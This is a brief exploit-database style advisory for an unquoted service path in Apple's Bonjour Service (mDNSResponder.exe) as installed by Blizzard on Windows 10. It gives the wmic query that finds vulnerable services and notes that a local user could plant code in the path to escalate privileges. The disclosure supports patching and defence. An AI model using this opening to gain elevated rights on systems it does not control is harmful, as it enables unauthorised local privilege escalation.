# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path # Discovery by: bios # Discovery Date: 2024-15-07 # Vendor Homepage: https://developer.apple.com/bonjour/ # Tested Version: 3,0,0,10 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Bonjour Service Bonjour Service C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe Auto C:\>systeminfo Host Name: DESKTOP-HFBJOBG OS Name: Microsoft Windows 10 Home OS Version: 10.0.19045 N/A Build 19045 PS C:\Program Files\Blizzard\Bonjour Service> powershell -command "(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion" >> 3,0,0,10 #Exploit: There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) . This may allow an authorized local user to insert arbitrary code into the unquoted service path and escalate privileges.